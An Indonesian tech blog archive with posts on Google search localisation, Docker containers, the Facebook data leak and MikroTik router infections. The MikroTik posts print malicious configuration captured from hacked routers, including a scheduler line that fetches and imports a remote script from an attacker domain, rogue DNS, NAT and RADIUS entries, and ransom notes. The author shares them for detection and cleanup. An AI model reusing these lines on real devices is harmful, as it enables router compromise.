Arsip Kategori: Dunia Teknologi

internet : mesin pencari oh pencari – sang kolektor data

email : ariyaandro@gmail.com

 

Berikut sedikit bahasan tentang dunia mesin pencari di internet khususnya yang semakin selektif menampilkan dan memilih data yang ada betebaran di jagat internet menurut blog ini tentunya ^_^

walau mimin sudah tidak belajar dunia data, setidaknya dengan berbagi cerita bisa lebih asik untuk mengingatnya. dimana bila suatu data diolah dan dikolek secara baik maka hasilnya sepertiberikut.

dalam bulan ini mimin mendengar salah satu mesin pencari yang handal yaitu mbah google semakin pintar-pintar menyuguhkan pencariannya, mulai dari selektif menampilkan barang2 online shop hingga yang akan di ulas berikut ini.

klo mimin lohat sekitar setahunan ini google menampilkan hasil pencarian barang online sangat membantu dan setidaknya mengahsilkan komparasi harga sekaligus walau yang kita cari hanya pengertian barnag tersbut.

1. nama barang muncul online shop nya dulu

kata kunci power bank saja malah suguhan pertamanya online shop… ^_^

lalu klo sedikit di imbuhkan lokasi,

berhubung mimin lagi luar kota, maka hasilnya langsung melihat jejak loe dimana… wow atau trasa terkuntit ^_^

jika hasilnya dari kota lain lagi hasilnya berikut

nah itu hasil percarian di komputer desktop, yang jelas tak ada perangkat GPS nya… nah loh !!!

2. cari judul malah keluar jadwal nontonya juga

disini alesan yang paling memicu mimin ingin bahas mbah, sudah tau weekend pengen nonton dari kemarin. eh tuh hasilnya malah ditunjukin jadwal tayangnya… tersinggung mimin sumpah 😀

hasil percarian merajuk di jakarta, berikut di surabaya-nya… hmmmm

asikkan hasilnya, tapi jangan tengkar bila hasil google nya temenmu di kota lain tetang sesuatu hal hasilnya beda… dan mungkin yang dimaksud bisa beda pula tar… hihihihihihi !!

3. dicarikan lowongan oleh mbah !!

nah pemanfaatan mesinpencari yang mimin denger sudah sampai sini, bisa langsung komparasi info-info lowongan pekerjaan dari beberapa agent lowker di sekitarmu…

tampilan wilayah jakarta

tampilan wilayah surabaya

sekali lagi gambar-gamabr di atas mimin ambil dari laptop dan komputer beda kota, dengan perlu diamati kata kunci yang mimin gunakan sejak awal yaitu sama saja. namun langsung liat jejak yang cari informasi itu dari mana dan langsung disuguhkan penyesuaian tempatnya.

 


yang ingin lebih mimin ingin sampaikan adalah ini tidak terlepas dari pemanfaatan big data hingga data mining yang sangat sudah variatif. dimana kemungkinan data yang akan dicari oleh pengguna google dengan berbagai hal yang informasi sudah di analis oleh mesin pencari, yang lebih kerennya pasti sedari beberapa tahun yang lalu sebagian mesin pencari sudah melakukan secara AI (kecerdasan buatan) untuk menganalis lebih cepat data yang semakin besar di internet. berikut visulisasi data mining yang di suguhkan dengan cantik,

sebelumnnya mimin juga membahas video itu di postingan terdahulu data mining – clustering

dapat terlihat bahwa data yang sedemikian rupa, bisa disuguhkan dengan baik secara visual manual. untuk hasilnya secara real yaitu seperti mbah google suguhkan… 🙂

sementara itulah yang mimin ingin sampaikan, yang tentunya masih jauh lebih dari cukup. dikarenakan ilmu data di dunia sistem informasi khususnya itu semakain kompleks seiring dengan apa yang ada bagikan di internet dan orang cari di internet. munkin mimin bisa memberi tips urutan belajarnya agar lebih truktural dimana mesin pencari juga belum mampu membuat pencarian yang menyuguhkan keterkaitan suatu ilmu di internet.

mungkin yang bisa anda tahapi yaitu,

  1. excel
  2. database
  3. access
  4. sql
  5. clustering
  6. mining
  7. big data
  8. ai / kecerdasan buatan (bukan buaian loh ya, awas ngantuk) hehehhehe

yang entunya berkaiatan dengan data

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Iklan

Mikrotik : Wabah september 2018

email : ariyaandro@gmail.com


belum genap 3 bulan penulis membahas impact serangan mikrotik kapan lalu di link berikut

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

 

Mikrotik : Wabah Oktober 2018

sudah ada yang lain yang belum jelas serangan seperti apa ini, yang jelas mem block koneksi IP public kembali dan mengisolasi akses dari beberapa IP. untungnya login mikrotik tidak di tutup total masih mau login via mac address antar mikrotik.

berikut beberapa capture config yang di obrak-abrik wabah mikrotik, yang belum sempat cek script config satu-satu… hehehhehhe

serangan pertama pertengahan september, tak diketahui apakah di sumber yang sama atau bagimana. ada pergerakan filter firewall yang aneh. akses ippublic terhalagi, untuk via MAC address masih bisa.

serengan berlanjut di akhir bulan september, yang semakin brutal hingga membuat script dan upload download ke link tak jelas arah lintang nya. dan yang ini tak tahu juga apah dari sumber yang sama di serangaan sebelumnnya.

ini baru sempat ngoprek config mana saja yang di sasar,.. berikut hasilnya :


/ip dns
set servers=”94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.20\
8.208.141″

/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
src-address-list=!Ok to-ports=8080
add action=redirect chain=dstnat comment=sysadminproxy disabled=yes dst-port=\
80 protocol=tcp src-address-list=!Ok to-ports=8080
add action=dst-nat chain=dst-nat disabled=yes dst-port=3333 protocol=tcp \
to-addresses=149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat disabled=yes dst-port=8888 protocol=tcp \
to-addresses=149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat disabled=yes dst-port=14444 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat disabled=yes dst-port=8008 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat disabled=yes dst-port=4444 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444

/ip proxy
set enabled=yes

/ip proxy access
add action=deny comment=sysadminpxy

/system note
set note=”DEVICE HACKED – ACCOUNT ftp HAD UNSAFE PASSWORD”

/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235


sedangkan pada menu file disk mikrotik ada file aneh berikut

yang salah satunya yaitu mikrotik.php dengan isi berikut

:do { /system scheduler set U3 name=”U5″ on-event=”/tool fetch url=http://ciskotik.com/poll/b8c07b87-7239-4acd-8012-92e7 mode=http dst-path=7xe7z\r\n/import 7xe7z” } on-error={ :put “U3 not found”}

:do { /system scheduler set U4 name=”U5″ on-event=”/tool fetch url=http://ciskotik.com/poll/b8c07b87-7239-4acd-8012-92e7 mode=http dst-path=7xe7z\r\n/import 7xe7z” } on-error={ :put “U4 not found”}

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

email : ariyaandro@gmail.com

Dear rekan teknis,

apakah jaringan anda tidak dapat diakses dari luar kantor ? selamat penulis juga sedang mengalaminya dalam semingguan ini, dan baru tersadar bahwa itu serangan masif terhadap khususnya router mikrotik ke seluruh dunia menurut beberapa sumber yang ada. namun sepertinya masalah ini sudah masif sejak maret 2018 hingga sekarang…

bila ip public (khususnya yang static) yang sedang menempel pada mikrotik sepertinya akan ikut terkena efeknya. sehingga bila ada koneksi dari luar kantor akan terkesan putus atau tak menemukan ip public, atau yang sempat terlihat penulis bahwa beberapa koneksi luar masih bisa masuk tersambung ke kantor tapi lebih kebanyakan terputus (tak bisa di ping).

langsung cek lah mikrotiknya, dilihat sekilas untungnya tak langsung serangan total terhadap mikrotik. dari 3an router yang ada hanya satu sepertinya yang full ter-inject setting mikrotiknya (moga aja begitu) dengan mambandingkan 3 router yang ada terlihat sepertinya tahap awal serangan akan membuat rule baru pada firewall (atau sepertinya ada yang sudah terhapus total rule firewall filter nya) yang terlihat seperti berikut :

gambar 1 : contoh rule firewall hajime botnet
sumber : https://forum.mikrotik.com/viewtopic.php?t=134965

itulah rule yang terlihat bisa sudah mulai terinfeksi, yang sebelumnya penulis kira ada penambahan rule dari provider. tersadar disaat ada masalah persis seperti di atas dan langsung tangan menggeliat cepat seperti ada info kebakaran gedung…

jika diperhatikan impact yang ada maka awalnya memang koneksi luar kan sulit masuk terhubung ke ip public kantor, namun akses webfig nya juga tertutup hingga service www port 80.

gambar 2 : contoh hajime lainnya

pada gambar 2 di atas terlihat sama rule nya dengan gambar 1, dan terlihat keterangan yang diberikan hampir sama semua terlebih ada kode BTC (mungkin bitcoin).

dari gambar 2 itu sebenarnya sekitar capture dari 3 harian yang lalu dan waktu di cek ulang ternyata sudah imbas hingga merubah nama identify name mikrotik menjadi HACKED , selebihnya belum menemukan lagi dampak rule yang ditimbulkannya.

berikut beberapa hal yang perlu diperhatikan awal untuk dikoreksi pada rule router mikrotik :

  1. jika router anda sering di check point / maintain di waktu tertentu pada file backup, maka langsung restore saja ke point restore pada tanggal yang dikira tak ada perubahan dan pas kondisi aman jaringan kantor.
  2. jika ingin membandingkan atau mencari rule mana saja yang aneh, maka backup dan bandungkan dengan backup config mikrotik sebelumnya saja. lalu lakukan penyesuaian ke semula. cara ini lakukan bila sebelumnya ada rule yang cukup banyak yang ada atau yang diterapkan pada mikrotik dan lupa backup nya.
  3. awalnya langsung delete/disable 6 rule yang ada seperti contoh gambar 1 dan 2 di atas
  4. pada firewall periksa pada address list, bila ada allow-ip maka itu hasil dari hajime pada rule filter, hapus/disable semua kecuali pada rule anda sendiri ada penamaan sama.
  5. periksalah ip DNS pada mikrotik, lakukan penyesuaian kembali jika berubah
    sumber : https://www.dodiventuraz.net/2018/05/cara-mengatasi-serangan-hajime-botnet-dan-chimay-red-exploit-di-router-mikrotik.html
  6. cek dan atur clock jika tak sesuai setting semua yang terpakai, pemulis mendapati bahwa auto time zone status NO. seperti contoh script berikut
    ________________________________________________________________________________

    /system clock
    
    set time-zone-autodetect=no

    ________________________________________________________________________________

  7. periksa radius mikrotik, bila ada yang aneh hapus/disable semua yang ada dan cek juga setting incoming nya (jika tak perlu maka radius incoming set accept NO saja). yang penulis peroleh dari capture config yang terinfeksi routernya ada serperti berikut
    ________________________________________________________________________________

    /radius
    
    add address=47.75.230.175 secret=test service=ppp
    
    add address=47.75.230.175 secret=test service=ppp
    
    add address=47.75.230.175 secret=test service=ppp
    
    /radius incoming
    
    set accept=yes

    ________________________________________________________________________________

  8. periksa service yang ada, dan sesuaikan dengan kebutuhan semula. ubah saja portnya jika perlu, dikarenakan menurut sumber yang ada ini salah satu sebab bug webfig mikrotik.
  9. system log pada mikrotik kembalikan enable semua (yang awal terifeksi ada yang belum di disable oleh hajime nya)
  10. periksalah apakah ada script yang terlihat aneh dan cek schedule script nya mirkotik
  11. pada systemm note router ada terselip kata2 intrupsi, penulis menyadari ketika sedang koreksi rule config dan membuktikan waktu buka new terminal
    ________________________________________________________________________________

    /system note
    
    set note="The security flaw for Hajime is closed by the firewall. Please updat\
    
    e RouterOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk\
    
    3nUgsdqQawiMLC1bUGDZWHowix1"

    ________________________________________________________________________________

  12. periksa system identity, tahap infeksi akhir yang penulis lihat terlihat akan berubah ke HACKED. bila terjadi maka tak usah panik, langsung saja ganti namanya kembali ke semula
  13. buat user baru yang full access, lalu disable user admin mikrotik atau ganti password admin
  14. selebihnya silahkan melakukan tahap2 penyesuaian kembali dan membuat rule penghalau bila masih di khawatirkan terinfeksi.
  15. trakhir coba finishing dengan upgrade RouterOS jika dibutuhkan sesuai rekomendasi sumber lainnya ke 6.41.x atau terbaru

serangan wabah mikrotik ini berlanjut kembali, mimin kaget lagi deh….

Mikrotik : Wabah september 2018

Mikrotik : Wabah Oktober 2018

 

TIPS !

mungkin bisa dibuat sebuah schedule script untuk clear semua firewall dan add rule minimum yang diperlukan, lalu di mode schedule per startup router mikrotik. agar lebih simple dan cepat recovery network dalam masalah seperti ini.

sumber yang ada :

https://www.dodiventuraz.net/2018/05/cara-mengatasi-serangan-hajime-botnet-dan-chimay-red-exploit-di-router-mikrotik.html

https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/

https://blog.radware.com/security/2018/03/mikrotik-routeros-based-botnet/

https://www.corero.com/blog/882-hajime-botnet-scanning-for-vulnerable-mikrotik-routers.html

 

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

 

Docker : melihat teknis kerjanya membangun container

email : ariyaandro@gmail.com

sebelum memulai membaca apa yang akan di gambarkan apa itu docker secara teknis dalam mambangun suatu container, alangkah baiknya sudah mengerti dan sedikit paham mengenai hal berikut :

  1. Virtual Machine (VM)
  2. Komputer Client – Server
  3. web server
  4. OOP (Object Oriented Programming)

Docker merupakan project open source yang menyediakan platform terbuka untuk developer maupun sysadmin untuk dapat membangun, membundel dan menjalankan aplikasi dimanapun dalam satu container yang ringan. Mirip seperti Virtual Machine (VM) namun lebih ringan karena Docker tidak membawa keseluruhan sistem operasi, melainkan berbagi sistem dengan host induknya.


lalu untuk pembuka gambaran docker bisa juga baca2 link berikut, dalam penyajian presentasinya cukup menarik dan simple :

https://xebia.github.io/twc-cd-with-docker/#/

untuk melihat gaya perintah dalam menggunakan docker untuk memfungsikan container, bisa dibaca juga link berikut :

https://blog.jayway.com/2015/03/21/a-not-very-short-introduction-to-docker/

sedikit ulasan berbahasa indonesianya bisa dari link berikut yang cukup enak bahasannnya :

https://blog.andi.dirgantara.co/teknologi-kontainer-pengantar-pengenalan-docker-706eafe03269

container yang akan dibahas ini adalah container yang berjalan di docker dengan VM desktop yaitu pada Virtual Box, yang mengambil basis pada windows. direkomendarikan menggunakan komputer atau laptop yang belum ada Virtual Box dan Docker yang terinstall sebelumnya. klo sudah sih tak apa, disini akan digambarkan sedikit demi sedikit penjelasan bagaimana container ini bisa jalan dan aktif siap digunakan secara sederhana.

sebagai pembuka, berikut gambaran teknis berdasarkan diagram proses docker container yang umum di internet dan kemudian di asumsikan oleh postingan ini secara teknis. dan tentunya tak terlepas dari saling koreksi selanjutnya, berikut gambaran sementara teknis dari docker :

gambar 1. diagram client-server dari container (in VMware) dan bukan container (in VBox)

bagaimana ? jadi salah expetasikah dengan hasil gambar dari hasil pencarian di internet dengan kata kunci “docker container

ok untuk jawabannya akan di tulis secara berkelanjutan lagi oleh mimin ya kakak. mimin juga sedang belajar docker ini dan memastikan pemahaman teknisnya dikarenakan masih sedikit sekali yang meruncing bahasan tentang segi teknis dari teknologi container ini khususnya di docker.

dari gambar 1 penulis mencoba untuk menterjemahkan sedikit demi sedikit bagaimana dan di mana proses suatu container terbentuk. pada umumnya system container digambarkan seperti diagram berikut.

lxc_2D00_vm

gambar 2. antara VM dan Container

sedikit info yang belum tahu dari gambar 2 di atas hypervisor dan VMware merupakan programs yang sama dalam membangun suatu VM. dapat diperhatikan bahwa sepertinya pada saat terbentuknya container tidak ada guest OS yang berjalan atau yang tergunakan, dengan langsung menuju ke binary/library yang ada di atas Host OS. untuk binary/library dan app itu sudah masuk dalam wilayah container, seperti berikut :

gamba 3. letak conrainer

dalam diagram gambar 2 tersebut wajar tak tergambarkan guest OS di container dikarenakan dalam system container tidak diperlukan system OS seutuhnya seperti loading booting, berbagai macam system pembangun ketika desktop os pertama up untuk siap digunakan kerja dan sebagainya secara penuh. namun container hanya memanfaatkan fungsi-fungsi penting dalam menjalankan suatu programs dalam suatu OS yang dapat diibaratkan ada VM/virtual machine windows server tanpa perlengkapan system32 secara penuh dalam membangun OS yang siap di operasinalkan hanya ada system pendukung penuh untuk segala aplikasi di “programs file”. maka pada gambar 2 dan 3 penulis sesuaikan lagi secara teknis pada gambar 1 di atas, dimana sebenarnya masih ada dan butuh system OS (seperti kutipan text hijau di awal postingan ini dan penjelasan dari yang lain tentang docker membangun container).

penulis mengambil proses pembentukan suatu container dari sisi aplikasi virtual mesin desktop yaitu Virtual Box, namun secara basic semua aplikasi/program VM itu bertujuan sama mensimulasikan OS secara virtual. dalam vmware terlihat dalam mambangun banyak aplikasi maka bisa membuat sebuah VM yang nantinya di dalam VM tersebut dijejali banyak aplikasi sesuai kebutuhan. namun untuk aplikasi dengan lintas OS (dari web server ubuntu ke fedora) tentunya akan membuat VM satu kembali dimana config VM untuk OS lainnya di miripkan atau sama dengan VM yang pertama tentunya walau OS nya berbeda dan dari segi aplikasi biasanya service antar lintas OS tentunya tak akan sama atau minimal mirip dikarenakan standard dari setiap OS berbeda dalam menjalankan prosedur aplikasinya. walau sebenarnya dengan cara clone VM sudah bisa membuat web server ulang dengan kelengkapannya kembali dengan resource yang hampir sama atau lebih ditinggikan kembali, dari sini teknologi container mengambil celahnya. berikut gambaran container pada docker :

gambar 4. container on docker

suatu container tidak harus membutuhkan config resource virtual mesin yang seperti di PC yang ada OS sepenuhnya. container diciptakan agar menggunakan resource serendahnya dan seperlunya saja, yang tentunya sudah terpangkas tak menggunakan system OS sepenuhnya. jikalau pada PC atau VM pada umumnya sebelum ada container ini, setiap VM itu dalam membangun OS nya harus ada file .ISO sebagai installer OS nya dan master aplikasi untuk di install. namun container tidak sepenuhnya seperti itu, dalam menjalankannya ini hanya me-read system OS (image.tar) dan terbentuklah container bedasarkan image yang di load di dalam system docker. sebenarnya image.tar ini seperti me-remastering linux sesuai kebutuhan khusus yang diinginkan dan mengemas ulang ke .ISO misal Linux Mint yang basisnya dari ubuntu. berikut kurang lebihnya bila image.tar dibedah.

gambar 5. dalam file image.tar

dapat sedikit dipahami kembali dari gambar 1 hingga 5 ini bahwa container ini sebenarnya ada system OS pendukung yang di sertakan walau tak selengkap dan power full dengan OS installer sepenuhnya pada desktop user. dan perlu diperhatikan bahwa image.tar debian di atas hanya sebesar sekitar 100 MB saja. cakep bukan 🙂

dari image.tar itu akan di read oleh container dan segala perubahan ada disimpan tersendiri pada data disk yang tercitak dalam docker berdasarkan per container yang terbentuk dalam docker di VM nya. maka dari dapt dijelaskan bahwa sebuah image container bisa dan boleh di akses oleh banyak container dengan tujuan berbeda-beda seperti berikut.

gambar 6. sistem barbagi image di container

dan dari beberapa gambar di atas dapat disimpulakan kembali seperti gambar berikut dalam melihat posisi kembali container pada docker.

gambar 7. containers_versus_virtual_machines


dari sini silahkan install dulu docker di windows, berikut link video install docker pada windows ( https://www.youtube.com/watch?v=3IEvmCYjdRc )

yang hasil install docker akan muncul 3 icon seperti pada gambar 8 di bawah ini yaitu VirtualBox, Kitematic,Docker QuickStart.

 

anydesk00027

gambar 8.properties VM docker container

VirtualBox disini akan ada vm default secara langsung merupakan vm dari docker yang tercipta saat proses instaasi docker tools.

Kitematic akan digunakan sebagai tool GUI untuk download registry dan setup docker nantinya secara sederhana pada windows. dimana di saat membuka tool ini akan langsung up kan vm docker di virtual box, dan nantinya akan sekaligus konek ke store domain docker.

gambar 9. startup kitematic

gambar 10. dashboard kitematic

dari menu gambar 10 di atas ada “My images” disitulah akan menampilkan daftar image container yang telah ter-downlaod yaitu image.tar.

Docker QuickStart sebuah jembatan terminal antara terminal/console pada vm docker yang sedang berjalan. dimana di saat membuka tool ini akan langsung up kan vm docker di virtual box, dan selebihnya bias manage docker dari sini untuk lebih advanced nya.

gambar 11. docker terminal

docker ini sebenarnya berjalan di dalam suatu VM (dalam hal ini dalam paket installernya menggunakan vm desktop yaitu VirtualBox) di mana file docker.iso (file sebenarnya boot2docker.iso) akan di load saat proses booting vm berjalan live (jadi bila didalamnya ada perubahan maka akan terhapus bila docker di booting ulang dalam VM). berikut isi folder VM docker yang tercipta

gamabr 9. isi folder vm docker pada windows

coba lihat setting properties dari VM docker (nama vm nya “defaut”) dalam virtual box agar semakin paham yang di maksud. terlihat bahwa ada disk virtual yang terbuat dan bila nantinya sudah ada image container dan container yang berdiri di dalam (disk.vmdk) docker maka disk tersebut akan membengkak seperti contoh di gambar 9. dan berdasarkan gambar 1 yaitu pada bagian drive (kotak orange) di dalam VM docker itulah disk.vmdk yang penulis maksud. jadi penggambaran docker selanjutnya seperti berikut.

gambar 10. digram berbagi service antar container

berikut hasil bila ada container yang sedang running, info IP dan Port dari suatu container akan dimunculkan sesuai fungsi dari container yang sudah di download yang artinya bila yang di ambil adalah container web server (nginx misalnya) maka akan ada info akses port ke 80 dari container tesebut dengan alias akses port random yang di infokan tentunya.

gambar 11. container running dan akses terminal suatu container

dari gambar 11 di atas terlihat bahwa container masih di sertakan folder persis seperti sebuah OS Linux utuh, sesuai bahasan teori teknis sebelumnya. sedikit catatan bahwa ketika kitematic ini di close, container masih dalam ke adaaan running dan bila semua container off VM docker tetaplah up juga. tapi tenang itu cuman setting di kitematic nya saja, jadi bisa di sesuaikan nantinya. dan dapat di akses pula container melalui terminal dari tombol menu EXEC dan akan di link openkan ke shell windows. dari shell terminal itu bisa dijalankan perintah Linux pada umumnya, namun bila menjalankan perintah shutdown Linux yaitu “init 0” seperti gambar di bawah ini maka pada container di dastboard kitematic masih terlihat running walau nantinya shell terminal nya akan close (bisa dibuka kembali dengan menekan kembali tombol EXEC). dari init 0 tadi terlihat bahwa system os tidak jalan seutuhnya sesuai konsep container, begitu pula perintah system lainnya yang biasanya ada pada OS desktop maupun Linux server yaitu make. berikut hasil eksekusi perintah Linux nya.

gambar 12. akses telminal container linux

gambaran port akses dari suatu contain dapat di lihat seperti berikut.

gambar 13. akses port container

coba stop dan start kembalilah container dari dashboard kitematic, butuh berapa detik ? nah itulah container ia hanya up langsung seperti maount sebuah file iso, dikarenakan image.tar saat di container kan ia hanya eksekusi langsung apa-apa yang ada di fungsi image tersebut.

munkin sementara itu penelasan teknisnya, lain waktu mngkin ada revisi kembali di posting ini setelah explore docker di kesempatan lainnya….


secara pandangan penulis ilmu container docker ini terletak pada tingkat/urutan/tahapan ilmu seperti berikut kurang lebihnya:

  1. komputer (pengertian umum)
  2. cara merakit PC (rakitan)
  3. operating system (Linux,windows,solaris,dkk)
  4. aplikasi server (apache,mysql,dkk)
  5. networking (routing,firewall)
  6. virtual mesin (Vbox,VMware,HyperV,dkk)
  7. container (LXC,docker,dkk)

jadi biar tak bingung masuk bab container ini, tentunya ilmu yang tersampaikan itu baik ketika pada waktunya.

 

selebihnya silahkan komen, bila ada kurangnya mohon maaf dan selebihnya diusahakan akan direvisi posting ini agar lebih relevan dan tepat sasaran…

salam rekan teknisi seprofesi
__________________________________

link profile teknis penulis

email : ariyaandro@gmail.com

Sisi Umum Dugaan Pencurian Data Jejaring Sosial

Hasil gambar untuk facebook like logo

akhirnya blog ini ikut angkat bicara juga soal pemberitaan pencurian data yang lagi ramai yaitu langsung sebut saja FB. namun sebelum panjang lebar membahas, murni ini catatan salah satu opini public dan jika disempitkan maka oponi personal sebagai yang berbidang IT dari kaca mata bidang keilmuan secara umum dan mungkin sedikit detail. tidak untuk membela salah satu pihak, namun lebih untuk mengajak berfikir ke dari beberapa sisi sebagai berikut :

  1. Data Pengguna Facebook Bocor Capai 87 Juta
    perkembangan berita sudah meningkat dari 50’an jt ke “Data Pengguna Facebook Bocor Capai 87 Juta”. apakah akan semakin meningkat ? mungkin masih bisa dikatakan ya. dan itu masih angka perkiraan, belum lagi yang akun yang sedikit tercuri datanya atau terambil non system. lalu apa yang harus dilakukan oleh kedua belah pihak.
    bolehlah sisahkan waktu untuk mengurangi beberapa data pribadi di FB, baik itu data tertulis maupun data tergambarkan alias foto2.
    mungkin FB juga pasti sembari malakukan pengecekan dan penyelidikan perambatan pencurian data baik system maupun non, mungkin divisi lainnya memikirkan kebijakan yang lebih disesuaikan.
    selepas dari itu, bila anda tak slalu bijak meng-info / men-share data diri tentang anda maka apapun pendataan di internet itu besar kecil pencurian data itu akan masih ada niat oleh pihak tertentu.
  2. Desakan agar Mark Zuckerberg mundur dari posisi CEO
    wow terlihat solusi menyakinkan bukan ?… anda sebagai pengguna pilih mana ia keluar atau pembenahan FB kembali hingga visi dan misi FB klo bersadar kasus pencurian data.
    sama seperti cerita mantan, cari yang lebih baik atau mau kembalilah jika ia menjadi lebih sangat baik… kan hal baik itu benar. hayoooooo !!!! hahahahhahahha
    selepas hal ini posistif atau negatif, lebih baik bagaimana kemungkinannya. ok lanjut…
    mengundurkan diri tak harus tak digunakan sebagai tim penasehat, mengundurkan diri tapi visi dan misi FB, mengundurkan diri tapi beberapa keputusan masih ikut campur, mengundurkan diri tapi membuat jelmaan jejaring lain, mengundurkan diri tapi motifator dan yang lainnya. namun semua itu wajar karena itu sesuatu hal yang bisa dan mungkin dilakukan.
    sebagai pengguna FB juga walau ikut mendesak2, tow klo FB langsung di reset semua anda mau bilang apa toh ini layanan free, layanan ini punya orang bukan punya bersama-sama, atau anda mengundurkan diri itu pun apa yang harus dikwatirkan dari anda dari sisi FB.
    FB pun lewayap sekarang, namun jiwa2 pembuat jejaring sosial masih belum selektif soal data personal tar yang ikut2 lagi dan bocor mau bilang giman lagikan.
  3. puasa media sosial
    ya gpp lah puasa media sosial, namun bila tak dibarengi dengan beberapa hal tentang pengertian masalah ini hingga intropeksi penggunaan bijaknya maka apa guna puasa ini. ok sabar…
    apapun media sosial nya, mulailah lebih bijak membagi data apa yang harus apa yang perlu apa yang semestinya dan lainnya. walau butuh waktu yang tak sedikit, namun yakinlah itu dan puasa ini akan sepadan untuk kedepan
  4. Pihak Kominfo berharap bisa melakukan shutdown aplikasi kuis
    memang praduga yang lagi bermasalah itu sebuah aplikasi kuis yang mengkolek data beberapa pengguna yang bersukarela datanya di analis. dari sisi programers sih bisa dibilang mungkin ada bug yang efektif untuk mendukung pengolekan data hingga pencurian bisa dilakukan.
    namun pencurian disini tidak dapat dikatakan pencurian sepenuhnya bila dilihat secara system, misal anda mancing yang di dalam danau tersebut ada jaring raksasa penuh ikan dan terkail oleh pancing anda maka … ? bayangkan sendiri apakah ini sengaja mancing dapat banyak atau yang buat jaring lupa akan jaringnya. hayoooooooooooooo !!! kepintaran otak pembaca mulai berandai2kan, nah wajar atau tidak ? tow manusia itu masih banyak lupanya. lupa akan niatnya cuman mancing, lupa akan jaringnya yang tertinggal, atau lupa bahwa fungsi kail seharusnya satu ikan saja.
    nah dalam bahasa pemongraman pengistilahan tujuan memancing lalu fungsi kail hingga ikan yang sekaligus terjaring itu bisa dikatakan kegiatan “query data”. silahkan di cari apa itu query 🙂
  5. sanksi yang diberikan cuma berupa teguran saja ke FB
    “cuma” ini bisa di artikan bukan hal yang simple atau mudah, namun penyederhanaan kerumitan keputusan yang harus diambil. yang pernah jadi ketua kelas hingga korlap acara mungkin lebih maksud apa yang dimaksud disini.
    misal ada kasus berita “cuma gara2 senyumin bini orang, suami langsung memukul orang lain”, ok santai bro. brita itu kan g sebut yang senyumin siapa (cowok/cewek), toh yang mengetahui berita tak biasa berfikir memferifikasi. bisa jadi sebelum si “cuma” itu datang, sebelum2nya yang terpukul itu menggoda2 bini orang dan suami sudah sabar dan tabah beberapa banyak kali. hayoooooooo ! think different kakak… 🙂
  6. FB Masih Kumpulkan Data SMS dan Telepon Pengguna
    yah ini mah wajar klo tujuannya…. klo tujuannya…. agar fungsi “rekomendasi teman yang mungkin nada kenal” dan memiliki FB baru bisa di info/notifkan ke akun anda. nah sudah mulai berfikir kah bearti ada sudah muali ber-“query” kembali.
    benar jika yang terbayang adalah bearti sudah hal yang standard dari dulu itu. ok santai tak usah emosi.
    sari segi
  7. ada sejuta data pengguna dari Indonesia yang disalahgunakan
    waoooo heboh yah, coba untuk hal ini masukan pengertian lumrah dan sangat bisa mungkin terjadiiiiiiii. mari dialog
    hey boleh kenal situ ?
    oh ya gpp silahkan.
    aku AA
    oh saya OO
    boleh minta nomor OO
    9740912849081324908239048902384902834902384
    maaf keburu ini, next time by contact itu ya
    oh ya gpp AA
    nahhhhhhhh………………… lanjutkan query anda. bila nomor itu di tawarin promo kartu kredit ? salah sapa, yang colong data sapa, yang kurang hati2 sapa. maaf bukan mengajak anda sekalian pelit bagi nomor tapi cobalah lebih berfikir untuk beberapa hal agar nantinya tak langsung menuduh yang minta itu yang salah untuk bagikan. namun bila HP AA di colong dan yang nyolong pintar untuk berbagi infomasi hingga menjual kontak ke penyedia promo ???? ok lanjut doa saja semoga kita selalu di Lindungi Tuhan Amin 🙂
  8. FB Mau Beberkan Data Anda Dicuri Atau Tidak
    bila anda sudah sedikit legowo dan think different maka silahkan segera lakukan penanggulangan sendiri, dan berharap tak berfatal di kehidupan. Amin 🙂
    dan semisal pencuri datanya pintar juga menghapus jejak apakah masih tak mau edit lagi data anda, so itu hak sepenuhnya yang punya akun untuk mau utek2 lagi atau tidak di beberapa akun internet nya.
  9. diketahui memindai link atau tautan dan foto-foto yang saling dikirimkan lewat aplikasi chat FB Messenger
    sekali lagi penjelasan detail, hal ini wajar dilakukan jika query yang berjalan adalah untuk menentukan iklan yang sesuai perkiraan keperluan akun dan iklan yang baik tentunya mengarah setepat mungkin ke para pengguna bukan sebagain pengasumsi suatu produk.
    dari sini jangan buruk sangka cepat2, secara pemograman bisa saja segala hasil analisa foto dan tautan akan di enkripsi/lock/kode-acak hingga hanya sistem saja yang bisa membacanya. maka memmindai disini bisa dikatan bukan mencuri sepenuhnya FB messenger itu, bila ada orang membaca gerak psikologi anda apakah itu dibilang mencuri/mengextrak prilaku anda. nah makin rumit kan memahami kasus ini… hahahhahahha 😀
    lanjut
  10. Para Genius yang Menguak ‘Borok’ FB dan Z
    sempat terpikir sih, ini kan aib. klo terpaksa share juga dan tak tepat menyampaikan nya kepada siapa malah tak baik juga dari kedua sisi.
    bisa dilogiskan seperti ini, borok itu kan juga bisa dikatakan status tersembunyi orang. nah hal seperti ini pun tak mesti dimasukan sebagai data sendiri di akun jejaring seseorang, kok malah terbocorkan. apalagi yang mem….. apakah siap menjaga privasi tanpa dibayar secara tak langsung, yup silahkan ber-query kembali. salah satu bayangan query-nya mungkin “kejahatan mungkin bukan dari niat si pelakunya, tapi mungkin ada kesempatan… waspadalah!!!” 😀 sepertinya terdengar familiar yah…..
  11. Toh tak ada kepastian yang benar pasti data terjamin, pastipun yang paling punya cuman Tuhan
    nah jelas lagi kan siapa yang menang banyak…. 🙂
